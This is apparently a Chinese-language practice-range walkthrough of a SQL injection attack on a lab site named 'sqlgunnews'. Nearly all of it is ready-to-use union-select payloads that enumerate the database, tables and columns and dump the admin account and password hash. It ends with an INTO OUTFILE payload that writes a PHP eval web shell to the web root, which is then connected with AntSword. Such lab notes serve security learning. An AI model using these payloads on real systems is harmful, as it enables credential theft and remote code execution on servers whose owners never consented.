进入靶场界面
输入框测试回显点
-1'union select 1,2,3#看看有木有回显点
查看数据库名
-1'union select 1,2,database()#
查看表名
-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#
查看admin表中列名
-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#
查看admin的账号和密码
-1'union select 1,2,group_concat(id,admin,password) from admin#
MD5解密密码为admin
扫面目录,没有后台登录界面,有一个phpinfo.php文件,访问获取绝对路径
写入一句话木马
-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/1.php' #
使用蚁剑链接